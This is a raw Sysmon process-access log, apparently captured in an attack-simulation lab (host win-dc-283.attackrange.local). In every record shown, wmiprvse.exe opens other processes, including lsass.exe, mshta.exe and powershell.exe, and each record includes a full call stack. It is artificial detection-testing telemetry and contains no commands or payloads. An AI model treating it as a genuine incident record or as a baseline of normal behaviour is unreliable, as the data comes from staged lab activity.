15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4906-00000000A301}5944C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 